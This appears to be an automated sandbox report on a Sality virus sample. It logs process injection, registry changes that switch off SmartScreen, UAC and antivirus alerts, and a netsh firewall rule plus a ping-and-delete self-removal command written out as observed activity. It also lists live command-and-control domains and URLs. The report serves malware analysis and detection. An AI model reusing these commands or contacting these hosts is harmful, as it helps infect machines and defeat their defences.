        Source: C:\Users\user\AppData\Roaming\Z0BAZwxx\jvauyc32.exe Memory written: C:\Program Files (x86)\uLdivQBsLwUSVlcZPOLOuLprjkaOnOfJQnbtXTiUPajfmPSEWeyz\sedSmibSjDOiaD.exe base: F00000
        Source: C:\Users\user\AppData\Roaming\Z0BAZwxx\jvauyc32.exe Memory written: C:\Program Files (x86)\uLdivQBsLwUSVlcZPOLOuLprjkaOnOfJQnbtXTiUPajfmPSEWeyz\sedSmibSjDOiaD.exe base: F10000
        Source: C:\Users\user\AppData\Roaming\Z0BAZwxx\jvauyc32.exe Memory written: C:\Program Files (x86)\uLdivQBsLwUSVlcZPOLOuLprjkaOnOfJQnbtXTiUPajfmPSEWeyz\sedSmibSjDOiaD.exe base: 1110000
        Source: C:\Users\user\AppData\Roaming\Z0BAZwxx\jvauyc32.exe Memory written: C:\Program Files (x86)\uLdivQBsLwUSVlcZPOLOuLprjkaOnOfJQnbtXTiUPajfmPSEWeyz\sedSmibSjDOiaD.exe base: 1120000
        Source: C:\Users\user\AppData\Roaming\Z0BAZwxx\jvauyc32.exe Memory written: C:\Program Files (x86)\uLdivQBsLwUSVlcZPOLOuLprjkaOnOfJQnbtXTiUPajfmPSEWeyz\sedSmibSjDOiaD.exe base: D00000
        Source: C:\Users\user\AppData\Roaming\Z0BAZwxx\jvauyc32.exe Memory written: C:\Program Files (x86)\uLdivQBsLwUSVlcZPOLOuLprjkaOnOfJQnbtXTiUPajfmPSEWeyz\sedSmibSjDOiaD.exe base: D10000
        Source: C:\Users\user\AppData\Roaming\Z0BAZwxx\jvauyc32.exe Memory written: C:\Program Files (x86)\uLdivQBsLwUSVlcZPOLOuLprjkaOnOfJQnbtXTiUPajfmPSEWeyz\sedSmibSjDOiaD.exe base: 3B0000
        Source: C:\Users\user\AppData\Roaming\Z0BAZwxx\jvauyc32.exe Memory written: C:\Program Files (x86)\uLdivQBsLwUSVlcZPOLOuLprjkaOnOfJQnbtXTiUPajfmPSEWeyz\sedSmibSjDOiaD.exe base: 3C0000
        Source: C:\Users\user\AppData\Roaming\Z0BAZwxx\jvauyc32.exe Memory written: C:\Program Files (x86)\uLdivQBsLwUSVlcZPOLOuLprjkaOnOfJQnbtXTiUPajfmPSEWeyz\sedSmibSjDOiaD.exe base: 930000
        Source: C:\Users\user\AppData\Roaming\Z0BAZwxx\jvauyc32.exe Memory written: C:\Program Files (x86)\uLdivQBsLwUSVlcZPOLOuLprjkaOnOfJQnbtXTiUPajfmPSEWeyz\sedSmibSjDOiaD.exe base: 940000
        Source: C:\Users\user\AppData\Roaming\Z0BAZwxx\jvauyc32.exe Memory written: C:\Program Files (x86)\uLdivQBsLwUSVlcZPOLOuLprjkaOnOfJQnbtXTiUPajfmPSEWeyz\sedSmibSjDOiaD.exe base: A40000
        Source: C:\Users\user\AppData\Roaming\Z0BAZwxx\jvauyc32.exe Memory written: C:\Program Files (x86)\uLdivQBsLwUSVlcZPOLOuLprjkaOnOfJQnbtXTiUPajfmPSEWeyz\sedSmibSjDOiaD.exe base: A50000
        Source: C:\Users\user\AppData\Roaming\Z0BAZwxx\jvauyc32.exe Memory written: C:\Program Files (x86)\uLdivQBsLwUSVlcZPOLOuLprjkaOnOfJQnbtXTiUPajfmPSEWeyz\sedSmibSjDOiaD.exe base: 9F0000
        Source: C:\Users\user\AppData\Roaming\Z0BAZwxx\jvauyc32.exe Memory written: C:\Program Files (x86)\uLdivQBsLwUSVlcZPOLOuLprjkaOnOfJQnbtXTiUPajfmPSEWeyz\sedSmibSjDOiaD.exe base: A00000
        Source: C:\Users\user\AppData\Roaming\Z0BAZwxx\jvauyc32.exe Memory written: C:\Program Files (x86)\uLdivQBsLwUSVlcZPOLOuLprjkaOnOfJQnbtXTiUPajfmPSEWeyz\sedSmibSjDOiaD.exe base: 780000
        Source: C:\Users\user\AppData\Roaming\Z0BAZwxx\jvauyc32.exe Memory written: C:\Program Files (x86)\uLdivQBsLwUSVlcZPOLOuLprjkaOnOfJQnbtXTiUPajfmPSEWeyz\sedSmibSjDOiaD.exe base: 790000
        Source: C:\Users\user\AppData\Roaming\Z0BAZwxx\jvauyc32.exe Memory written: C:\Program Files (x86)\uLdivQBsLwUSVlcZPOLOuLprjkaOnOfJQnbtXTiUPajfmPSEWeyz\sedSmibSjDOiaD.exe base: 7B0000
        Source: C:\Users\user\AppData\Roaming\Z0BAZwxx\jvauyc32.exe Memory written: C:\Program Files (x86)\uLdivQBsLwUSVlcZPOLOuLprjkaOnOfJQnbtXTiUPajfmPSEWeyz\sedSmibSjDOiaD.exe base: 7C0000
        Source: C:\Users\user\AppData\Roaming\Z0BAZwxx\jvauyc32.exe Memory written: C:\Program Files (x86)\uLdivQBsLwUSVlcZPOLOuLprjkaOnOfJQnbtXTiUPajfmPSEWeyz\sedSmibSjDOiaD.exe base: 780000
        Source: C:\Users\user\AppData\Roaming\Z0BAZwxx\jvauyc32.exe Memory written: C:\Program Files (x86)\uLdivQBsLwUSVlcZPOLOuLprjkaOnOfJQnbtXTiUPajfmPSEWeyz\sedSmibSjDOiaD.exe base: 7D0000
        Source: C:\Users\user\AppData\Roaming\Z0BAZwxx\jvauyc32.exe Memory written: C:\Program Files (x86)\uLdivQBsLwUSVlcZPOLOuLprjkaOnOfJQnbtXTiUPajfmPSEWeyz\sedSmibSjDOiaD.exe base: AC0000
        Source: C:\Users\user\AppData\Roaming\Z0BAZwxx\jvauyc32.exe Memory written: C:\Program Files (x86)\uLdivQBsLwUSVlcZPOLOuLprjkaOnOfJQnbtXTiUPajfmPSEWeyz\sedSmibSjDOiaD.exe base: B10000
        Source: C:\Users\user\AppData\Roaming\Z0BAZwxx\jvauyc32.exe Memory written: C:\Program Files (x86)\uLdivQBsLwUSVlcZPOLOuLprjkaOnOfJQnbtXTiUPajfmPSEWeyz\sedSmibSjDOiaD.exe base: 7D0000
        Source: C:\Users\user\AppData\Roaming\Z0BAZwxx\jvauyc32.exe Memory written: C:\Program Files (x86)\uLdivQBsLwUSVlcZPOLOuLprjkaOnOfJQnbtXTiUPajfmPSEWeyz\sedSmibSjDOiaD.exe base: 820000
        Source: C:\Users\user\AppData\Roaming\Z0BAZwxx\jvauyc32.exe Memory written: C:\Program Files (x86)\uLdivQBsLwUSVlcZPOLOuLprjkaOnOfJQnbtXTiUPajfmPSEWeyz\sedSmibSjDOiaD.exe base: 1550000
        Source: C:\Users\user\AppData\Roaming\Z0BAZwxx\jvauyc32.exe Memory written: C:\Program Files (x86)\uLdivQBsLwUSVlcZPOLOuLprjkaOnOfJQnbtXTiUPajfmPSEWeyz\sedSmibSjDOiaD.exe base: 15A0000
        Source: C:\Users\user\AppData\Roaming\Z0BAZwxx\jvauyc32.exe Memory written: C:\Program Files (x86)\uLdivQBsLwUSVlcZPOLOuLprjkaOnOfJQnbtXTiUPajfmPSEWeyz\sedSmibSjDOiaD.exe base: ED0000
        Source: C:\Users\user\AppData\Roaming\Z0BAZwxx\jvauyc32.exe Memory written: C:\Program Files (x86)\uLdivQBsLwUSVlcZPOLOuLprjkaOnOfJQnbtXTiUPajfmPSEWeyz\sedSmibSjDOiaD.exe base: EE0000
        Source: C:\Users\user\AppData\Roaming\Z0BAZwxx\jvauyc32.exe Memory written: C:\Program Files (x86)\uLdivQBsLwUSVlcZPOLOuLprjkaOnOfJQnbtXTiUPajfmPSEWeyz\sedSmibSjDOiaD.exe base: 11D0000
        Source: C:\Users\user\AppData\Roaming\Z0BAZwxx\jvauyc32.exe Memory written: C:\Program Files (x86)\uLdivQBsLwUSVlcZPOLOuLprjkaOnOfJQnbtXTiUPajfmPSEWeyz\sedSmibSjDOiaD.exe base: 11E0000
        Source: C:\Users\user\AppData\Roaming\Z0BAZwxx\jvauyc32.exe Memory written: C:\Program Files (x86)\uLdivQBsLwUSVlcZPOLOuLprjkaOnOfJQnbtXTiUPajfmPSEWeyz\sedSmibSjDOiaD.exe base: DA0000
        Source: C:\Users\user\AppData\Roaming\Z0BAZwxx\jvauyc32.exe Memory written: C:\Program Files (x86)\uLdivQBsLwUSVlcZPOLOuLprjkaOnOfJQnbtXTiUPajfmPSEWeyz\sedSmibSjDOiaD.exe base: DB0000
        Source: C:\Users\user\AppData\Roaming\Z0BAZwxx\jvauyc32.exe Memory written: C:\Program Files (x86)\uLdivQBsLwUSVlcZPOLOuLprjkaOnOfJQnbtXTiUPajfmPSEWeyz\sedSmibSjDOiaD.exe base: 1250000
        Source: C:\Users\user\AppData\Roaming\Z0BAZwxx\jvauyc32.exe Memory written: C:\Program Files (x86)\uLdivQBsLwUSVlcZPOLOuLprjkaOnOfJQnbtXTiUPajfmPSEWeyz\sedSmibSjDOiaD.exe base: 1260000
        Source: C:\Users\user\AppData\Roaming\Z0BAZwxx\jvauyc32.exeMemory written: C:\Program Files (x86)\uLdivQBsLwUSVlcZPOLOuLprjkaOnOfJQnbtXTiUPajfmPSEWeyz\sedSmibSjDOiaD.exe base: BC0000Jump to behavior
        Source: C:\Users\user\AppData\Roaming\Z0BAZwxx\jvauyc32.exeMemory written: C:\Program Files (x86)\uLdivQBsLwUSVlcZPOLOuLprjkaOnOfJQnbtXTiUPajfmPSEWeyz\sedSmibSjDOiaD.exe base: BD0000Jump to behavior
        Source: C:\Users\user\AppData\Roaming\Z0BAZwxx\jvauyc32.exeMemory written: C:\Program Files (x86)\uLdivQBsLwUSVlcZPOLOuLprjkaOnOfJQnbtXTiUPajfmPSEWeyz\sedSmibSjDOiaD.exe base: 1280000Jump to behavior
        Source: C:\Users\user\AppData\Roaming\Z0BAZwxx\jvauyc32.exeMemory written: C:\Program Files (x86)\uLdivQBsLwUSVlcZPOLOuLprjkaOnOfJQnbtXTiUPajfmPSEWeyz\sedSmibSjDOiaD.exe base: 12D0000Jump to behavior
        Source: C:\Users\user\AppData\Roaming\Z0BAZwxx\jvauyc32.exeMemory written: C:\Program Files (x86)\uLdivQBsLwUSVlcZPOLOuLprjkaOnOfJQnbtXTiUPajfmPSEWeyz\sedSmibSjDOiaD.exe base: 900000Jump to behavior
        Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Sector.30.15961.3704.exeProcess created: C:\Windows\SysWOW64\cmd.exe /a /c ping 127.0.0.1 -n 3&del "C:\Users\user\Desktop\SECURI~1.EXE"Jump to behavior
        Source: C:\Users\user\AppData\Roaming\Z0BAZwxx\jvauyc32.exeProcess created: C:\Windows\SysWOW64\cmd.exe /a /c netsh advfirewall firewall add rule name="Z0BAZwxx" dir=in action=allow program="C:\Users\user\AppData\Roaming\Z0BAZwxx\jvauyc32.exe"Jump to behavior
        Source: C:\Users\user\AppData\Roaming\Z0BAZwxx\jvauyc32.exeProcess created: C:\Users\user\AppData\Roaming\Z0BAZwxx\jvauyc32.exe "C:\Users\user\AppData\Roaming\Z0BAZwxx\jvauyc32.exe"Jump to behavior
        Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\PING.EXE ping 127.0.0.1 -n 3Jump to behavior
        Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\netsh.exe netsh advfirewall firewall add rule name="Z0BAZwxx" dir=in action=allow program="C:\Users\user\AppData\Roaming\Z0BAZwxx\jvauyc32.exe"Jump to behavior
        Source: dwm.exe, 00000006.00000000.1583110627.00000283DBDF1000.00000002.00000001.00040000.00000000.sdmp, sihost.exe, 00000013.00000002.4049244093.000001CF1D3D1000.00000002.00000001.00040000.00000000.sdmp, sihost.exe, 00000013.00000000.1723698444.000001CF1D3D1000.00000002.00000001.00040000.00000000.sdmpBinary or memory string: Program Manager
        Source: dwm.exe, 00000006.00000000.1583110627.00000283DBDF1000.00000002.00000001.00040000.00000000.sdmp, jvauyc32.exe, 00000012.00000003.2501792831.0000000003400000.00000004.00001000.00020000.00000000.sdmp, sihost.exe, 00000013.00000002.4049244093.000001CF1D3D1000.00000002.00000001.00040000.00000000.sdmpBinary or memory string: Shell_TrayWnd
        Source: dwm.exe, 00000006.00000000.1583110627.00000283DBDF1000.00000002.00000001.00040000.00000000.sdmp, sihost.exe, 00000013.00000002.4049244093.000001CF1D3D1000.00000002.00000001.00040000.00000000.sdmp, sihost.exe, 00000013.00000000.1723698444.000001CF1D3D1000.00000002.00000001.00040000.00000000.sdmpBinary or memory string: Progman
        Source: dwm.exe, 00000006.00000000.1567670938.00000283DB78C000.00000004.00000020.00020000.00000000.sdmp, dwm.exe, 00000006.00000002.4039816798.00000283DB78C000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Program ManagerS
        Source: dwm.exe, 00000006.00000000.1583110627.00000283DBDF1000.00000002.00000001.00040000.00000000.sdmp, sihost.exe, 00000013.00000002.4049244093.000001CF1D3D1000.00000002.00000001.00040000.00000000.sdmp, sihost.exe, 00000013.00000000.1723698444.000001CF1D3D1000.00000002.00000001.00040000.00000000.sdmpBinary or memory string: Progmanlock
        Source: jvauyc32.exe, 00000012.00000003.3680460042.0000000003194000.00000004.00001000.00020000.00000000.sdmp, jvauyc32.exe, 00000012.00000003.2472871899.0000000003424000.00000004.00001000.00020000.00000000.sdmp, jvauyc32.exe, 00000012.00000003.2217116667.0000000003D54000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: Progmanq
        Source: C:\Windows\SysWOW64\netsh.exeQueries volume information: C:\ VolumeInformationJump to behavior
        Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Sector.30.15961.3704.exeCode function: 1_2_0143E329 MultiByteToWideChar,RtlEnterCriticalSection,GetLocalTime,GetFileAttributesA,SetFileAttributesA,CreateFileA,GetFileSize,GetFileTime,CreateFileMappingA,MapViewOfFile,lstrcpyn,lstrcmpiA,GlobalAlloc,IsBadWritePtr,IsBadWritePtr,IsBadWritePtr,IsBadWritePtr,IsBadWritePtr,IsBadWritePtr,IsBadWritePtr,IsBadWritePtr,IsBadWritePtr,lstrcmpiA,lstrcmpiA,lstrcmpiA,lstrcmpiA,lstrcmpiA,GetTickCount,GlobalAlloc,UnmapViewOfFile,CloseHandle,SetFilePointer,SetEndOfFile,WriteFile,GlobalFree,SetFileTime,CloseHandle,SetFileAttributesA,DeleteFileA,GlobalFree,RtlLeaveCriticalSection,Sleep,1_2_0143E329
        Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Sector.30.15961.3704.exeCode function: 1_2_01443B60 LoadLibraryA,GetProcAddress,GetProcAddress,GetProcAddress,LoadLibraryA,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,RegOpenKeyExA,RegSetValueExA,RegCloseKey,RegOpenKeyExA,RegSetValueExA,RegCloseKey,lstrcpy,lstrcat,RegOpenKeyExA,GetModuleFileNameA,wsprintfA,lstrlen,RegSetValueExA,RegCloseKey,RegOpenKeyExA,RegSetValueExA,RegSetValueExA,RegSetValueExA,RegCloseKey,GetWindowsDirectoryA,lstrlen,lstrcat,GetComputerNameA,lstrlen,lstrlen,lstrcpy,GetUserNameA,lstrlen,lstrcpy,lstrlen,lstrlen,GetTempPathA,lstrlen,lstrcat,lstrcpy,lstrcpy,lstrlen,lstrlen,lstrcat,CreateFileMappingA,lstrlen,GetTickCount,wsprintfA,lstrlen,wsprintfA,lstrcat,GetSystemDirectoryA,lstrlen,lstrcat,lstrcat,lstrcat,GlobalAlloc,GlobalAlloc,1_2_01443B60
        Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Sector.30.15961.3704.exeCode function: 1_2_01441EF6 OpenProcess,GetLastError,GetVersionExA,GetCurrentThread,OpenThreadToken,GetLastError,GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueA,AdjustTokenPrivileges,CloseHandle,GetLastError,CloseHandle,OpenProcess,AdjustTokenPrivileges,CloseHandle,OpenProcessToken,GetTokenInformation,GetLastError,GetProcessHeap,RtlAllocateHeap,GetTokenInformation,LookupAccountSidA,lstrcmpiA,lstrcmpiA,lstrcmpiA,CreateMutexA,VirtualAllocEx,WriteProcessMemory,CreateRemoteThread,VirtualAllocEx,lstrlen,WriteProcessMemory,CreateRemoteThread,CloseHandle,CloseHandle,GetProcessHeap,HeapFree,1_2_01441EF6
        Source: C:\Users\user\AppData\Roaming\Z0BAZwxx\jvauyc32.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuidJump to behavior

        Lowering of HIPS / PFW / Operating System Security Settings

        Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Sector.30.15961.3704.exe | Key value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Security Center AntiVirusOverride
        Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Sector.30.15961.3704.exe | Registry key or value deleted: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\SafeBoot AlternateShell
        Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Sector.30.15961.3704.exe | Registry value created: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System EnableLUA
        Source: C:\Users\user\AppData\Roaming\Z0BAZwxx\jvauyc32.exe | Registry key created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Explorer SmartScreenEnabled Off
        Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Sector.30.15961.3704.exe | Registry key value created / modified: HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Security Center
        Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Sector.30.15961.3704.exe | Registry key value created / modified: HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Security Center\Svc
        Source: C:\Users\user\AppData\Roaming\Z0BAZwxx\jvauyc32.exe | Registry key value created / modified: HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Security Center\Svc
        Source: C:\Users\user\AppData\Roaming\Z0BAZwxx\jvauyc32.exe | Process created: C:\Windows\SysWOW64\cmd.exe /a /c netsh advfirewall firewall add rule name="Z0BAZwxx" dir=in action=allow program="C:\Users\user\AppData\Roaming\Z0BAZwxx\jvauyc32.exe"
        Source: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\SharedAccess\Parameters\FirewallPolicy\StandardProfile | Registry value created: DisableNotifications 1
        Source: C:\Windows\SysWOW64\cmd.exe | Process created: C:\Windows\SysWOW64\netsh.exe netsh advfirewall firewall add rule name="Z0BAZwxx" dir=in action=allow program="C:\Users\user\AppData\Roaming\Z0BAZwxx\jvauyc32.exe"
        Source: jvauyc32.exe, 00000012.00000002.4048026026.00000000016CE000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: Defender\MsMpeng.exe
        Source: C:\Users\user\AppData\Roaming\Z0BAZwxx\jvauyc32.exe | WMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter2 : SELECT * FROM AntiVirusProduct
        Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Sector.30.15961.3704.exe | Code function: 1_2_014383C9 socket,htons,bind,listen,accept,CreateThread,closesocket,RtlExitUserThread, 1_2_014383C9
        Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Sector.30.15961.3704.exe | Code function: 1_2_01437A3A htons,socket,setsockopt,bind,GlobalAlloc,recvfrom,CreateThread,GlobalFree,closesocket,RtlExitUserThread, 1_2_01437A3A
        MITRE ATT&CK matrix columns: Reconnaissance | Resource Development | Initial Access | Execution | Persistence | Privilege Escalation | Defense Evasion | Credential Access | Discovery | Lateral Movement | Collection | Command and Control | Exfiltration | Impact
        Gather Victim Identity InformationAcquire Infrastructure12
        Replication Through Removable Media
        1
        Windows Management Instrumentation
        1
        DLL Side-Loading
        1
        Abuse Elevation Control Mechanism
        8
        Disable or Modify Tools
        1
        Credential API Hooking
        1
        System Time Discovery
        Remote Services1
        Archive Collected Data
        4
        Ingress Tool Transfer
        Exfiltration Over Other Network Medium1
        Inhibit System Recovery
        CredentialsDomainsDefault Accounts2
        Native API
        1
        Windows Service
        1
        DLL Side-Loading
        1
        Abuse Elevation Control Mechanism
        LSASS Memory11
        Peripheral Device Discovery
        Remote Desktop Protocol1
        Browser Session Hijacking
        2
        Encrypted Channel
        Exfiltration Over BluetoothNetwork Denial of Service
        Email AddressesDNS ServerDomain Accounts2
        Command and Scripting Interpreter
        1
        Registry Run Keys / Startup Folder
        1
        Bypass User Account Control
        2
        Obfuscated Files or Information
        Security Account Manager1
        Account Discovery
        SMB/Windows Admin Shares1
        Screen Capture
        1
        Non-Standard Port
        Automated ExfiltrationData Encrypted for Impact
        Employee NamesVirtual Private ServerLocal AccountsCronLogin Hook1
        Access Token Manipulation
        3
        Software Packing
        NTDS3
        File and Directory Discovery
        Distributed Component Object Model1
        Credential API Hooking
        4
        Non-Application Layer Protocol
        Traffic DuplicationData Destruction
        Gather Victim Network InformationServerCloud AccountsLaunchdNetwork Logon Script1
        Windows Service
        1
        DLL Side-Loading
        LSA Secrets16
        System Information Discovery
        SSHKeylogging14
        Application Layer Protocol
        Scheduled TransferData Encrypted for Impact
        Domain PropertiesBotnetReplication Through Removable MediaScheduled TaskRC Scripts612
        Process Injection
        1
        Bypass User Account Control
        Cached Domain Credentials1
        Query Registry
        VNCGUI Input CaptureMultiband CommunicationData Transfer Size LimitsService Stop
        DNSWeb ServicesExternal Remote ServicesSystemd TimersStartup Items1
        Registry Run Keys / Startup Folder
        1
        File Deletion
        DCSync761
        Security Software Discovery
        Windows Remote ManagementWeb Portal CaptureCommonly Used PortExfiltration Over C2 ChannelInhibit System Recovery
        Network Trust DependenciesServerlessDrive-by CompromiseContainer Orchestration JobScheduled Task/JobScheduled Task/Job11
        Masquerading
        Proc Filesystem341
        Virtualization/Sandbox Evasion
        Cloud ServicesCredential API HookingApplication Layer ProtocolExfiltration Over Alternative ProtocolDefacement
        Network TopologyMalvertisingExploit Public-Facing ApplicationCommand and Scripting InterpreterAtAt341
        Virtualization/Sandbox Evasion
        /etc/passwd and /etc/shadow3
        Process Discovery
        Direct Cloud VM ConnectionsData StagedWeb ProtocolsExfiltration Over Symmetric Encrypted Non-C2 ProtocolInternal Defacement
        IP AddressesCompromise InfrastructureSupply Chain CompromisePowerShellCronCron1
        Access Token Manipulation
        Network Sniffing1
        Application Window Discovery
        Shared WebrootLocal Data StagingFile Transfer ProtocolsExfiltration Over Asymmetric Encrypted Non-C2 ProtocolExternal Defacement
        Network Security AppliancesDomainsCompromise Software Dependencies and Development ToolsAppleScriptLaunchdLaunchd612
        Process Injection
        Input Capture1
        System Owner/User Discovery
        Software Deployment ToolsRemote Data StagingMail ProtocolsExfiltration Over Unencrypted Non-C2 ProtocolFirmware Corruption
        Gather Victim Org InformationDNS ServerCompromise Software Supply ChainWindows Command ShellScheduled TaskScheduled Task2
        Hidden Files and Directories
        Keylogging1
        Remote System Discovery
        Taint Shared ContentScreen CaptureDNSExfiltration Over Physical MediumResource Hijacking
        Determine Physical LocationsVirtual Private ServerCompromise Hardware Supply ChainUnix ShellSystemd TimersSystemd TimersCommand ObfuscationGUI Input Capture1
        System Network Configuration Discovery
        Replication Through Removable MediaEmail CollectionProxyExfiltration over USBNetwork Denial of Service

        Legend:

        • Process
        • Signature
        • Created File
        • DNS/IP Info
        • Is Dropped
        • Is Windows Process
        • Number of created Registry Values
        • Number of created Files
        • Visual Basic
        • Delphi
        • Java
        • .Net C# or VB.NET
        • C, C++ or other language
        • Is malicious
        • Internet
        Behavior Graph (text reconstruction of the graph image) - ID: 1536957, Sample: SecuriteInfo.com.Win32.Sect..., Startdate: 18/10/2024, Architecture: WINDOWS, Score: 100

        Start node: DNS/IP: padrup.com; onyx.deepdns.cryptostorm.net; 11 other IPs or domains. Signatures: Suricata IDS alerts for network traffic; Malicious sample detected (through community Yara rule); Antivirus detection for dropped file; 9 other signatures.

        SecuriteInfo.com.Win32.Sector.30.15961.3704.exe (started; 501 created registry values, 15 created files): DNS/IP: padrup.com 185.53.178.50, ports 49707, 49712, 49716, TEAMINTERNET-ASDE, Germany; 190.120.227.91, ports 49709, 49713, 49719, SARAONLINEINFORMATICAEIRELI-MEBR, unknown; 7 other IPs or domains. Dropped: C:\voiv.exe (PE32); C:\Users\user\AppData\...\jvauyc32.exe (PE32); C:\Users\user\AppData\Local\...\winmxfy.exe (PE32); 2 other malicious files. Signatures: Query firmware table information (likely to detect VMs); Creates autorun.inf (USB autostart); Creates HTML files with .exe extension (expired dropper behavior); 14 other signatures. Children: jvauyc32.exe (started; 501 registry values, 46 files); cmd.exe (started; 1 file); fontdrvhost.exe (injected); 2 other processes.

        jvauyc32.exe: DNS/IP: n.ddnsgratis.com.br; 113.21.72.31, port 6832, WISHNET-AS-APWISHNETPRIVATELIMITEDIN, India; 89 other IPs or domains. Dropped: C:\Users\user\AppData\Local\...\winkvnav.exe (PE32); C:\Users\user\AppData\Local\Temp\rckc.exe (PE32); C:\Program Files (x86)\...\msedge.exe (PE32+). Signatures: Multi AV Scanner detection for dropped file; Query firmware table information (likely to detect VMs); Tries to detect sandboxes and other dynamic analysis tools (window names); 14 other signatures. Children: explorer.exe (injected); sedSmibSjDOiaD.exe (injected); sedSmibSjDOiaD.exe (injected); 23 other processes.

        cmd.exe: Signatures: Uses ping.exe to sleep; Uses ping.exe to check the status of other devices and networks; Uses netsh to modify the Windows network and firewall settings. Children: conhost.exe (started); PING.EXE (started; 1 file).

        explorer.exe (injected): Children: jvauyc32.exe (started).

        sedSmibSjDOiaD.exe (injected): Signatures: Found direct / indirect Syscall (likely to bypass EDR).

        23 other processes: DNS/IP: n.ddnsgratis.com.br 194.5.152.215, ports 49733, 49867, 50031, DEDIPATH-LLCUS, Germany. Children: conhost.exe (started); netsh.exe (started; 2 files).

        jvauyc32.exe (started from explorer.exe): Signatures: Query firmware table information (likely to detect VMs); Hides threads from debuggers; Tries to detect sandboxes / dynamic malware analysis system (registry check); Tries to detect process monitoring tools (Task Manager, Process Explorer etc.).

        Source | Detection | Scanner | Label | Link
        SecuriteInfo.com.Win32.Sector.30.15961.3704.exe | 95% | ReversingLabs | Win32.Virus.Sality
        SecuriteInfo.com.Win32.Sector.30.15961.3704.exe | 100% | Avira | W32/Sality.AT
        SecuriteInfo.com.Win32.Sector.30.15961.3704.exe | 100% | Joe Sandbox ML
        Source | Detection | Scanner | Label | Link
        C:\Users\user\AppData\Local\Temp\winfpnht.exe | 100% | Avira | W32/Sality.AT
        C:\Users\user\AppData\Local\Temp\rckc.exe | 100% | Avira | W32/Sality.AT
        C:\Users\user\AppData\Local\Temp\winfpnht.exe | 100% | Joe Sandbox ML
        C:\Users\user\AppData\Local\Temp\rckc.exe | 100% | Joe Sandbox ML
        C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | 0% | ReversingLabs
        C:\Users\user\AppData\Roaming\Z0BAZwxx\jvauyc32.exe | 95% | ReversingLabs | Win32.Virus.Sality
        No Antivirus matches
        No Antivirus matches
        Source | Detection | Scanner | Label | Link
        https://cdn.query.prod.cms.msn.com/cms/api/amp/binary/AA13f2DV | 0% | URL Reputation | safe
        https://api.msn.com:443/v1/news/Feed/Windows? | 0% | URL Reputation | safe
        https://assets.msn.com/weathermapdata/1/static/finance/1stparty/FinanceTaskbarIcons/Finance_Earnings | 0% | URL Reputation | safe
        http://schemas.micro | 0% | URL Reputation | safe
        https://reactjs.org/docs/error-decoder.html?invariant= | 0% | URL Reputation | safe
        Name | IP | Active | Malicious | Antivirus Detection | Reputation
        ns1.random.dns.d0wn.biz | 178.17.170.133 | true | false | | unknown
        ns2.fr.dns.d0wn.biz | 37.187.0.40 | true | false | | unknown
        ist.fellig.org | 178.63.145.236 | true | false | | unknown
        ns2.random.dns.d0wn.biz | 185.14.29.140 | true | false | | unknown
        ns1.sg.dns.d0wn.biz | 128.199.248.105 | true | false | | unknown
        n.ddnsgratis.com.br | 194.5.152.215 | true | true | | unknown
        padrup.com | 185.53.178.50 | true | true | | unknown
        ns1.nl.dns.d0wn.biz | 95.85.9.86 | true | false | | unknown
        alors.deepdns.cryptostorm.net | unknown | unknown | true | | unknown
        civet.ziphaze.com | unknown | unknown | true | | unknown
        anyone.dnsrec.meo.ws | unknown | unknown | true | | unknown
        onyx.deepdns.cryptostorm.net | unknown | unknown | true | | unknown
        ns1.any.dns.d0wn.biz | unknown | unknown | true | | unknown
        ns.dotbit.me | unknown | unknown | true | | unknown
        Name | Malicious | Antivirus Detection | Reputation
        http://padrup.com/sobaka1.gif?28892810=465574000 | true | | unknown
        http://padrup.com/sobaka1.gif?2e00e35c=-1979536876 | true | | unknown
        http://190.120.227.91:8080/sobakavolos.gif?7d519a=82128900 | true | | unknown
        http://190.120.227.91:8080/sobakavolos.gif?1847fe9d=-1443367349 | true | | unknown
        http://padrup.com/sobaka1.gif?29d43e7c=701775484 | true | | unknown
        http://190.120.227.91:8080/sobakavolos.gif?2c5425f=92964030 | true | | unknown
        http://190.120.227.91:8080/sobakavolos.gif?328f1419=848237593 | true | | unknown
        http://n.ddnsgratis.com.br/n/tasks.php | true | | unknown
        http://padrup.com/sobaka1.gif?2bc60f28=-2091766408 | true | | unknown
        http://190.120.227.91:8080/sobakavolos.gif?25d5c2b0=-486371296 | true | | unknown
        http://padrup.com/sobaka1.gif?311dbd80=1473261184 | true | | unknown
        http://190.120.227.91:8080/sobakavolos.gif?253429ca=1872526686 | true | | unknown
        http://190.120.227.91:8080/sobakavolos.gif?3337cce9=1720097375 | true | | unknown
        http://190.120.227.91:8080/sobakavolos.gif?352e846=390355434 | true | | unknown
        http://padrup.com/sobaka1.gif?1495f698=690744624 | true | | unknown
        http://190.120.227.91:8080/sobakavolos.gif?4991659=617132744 | true | | unknown
        http://padrup.com/sobaka1.gif?3269d32c=845796140 | true | | unknown
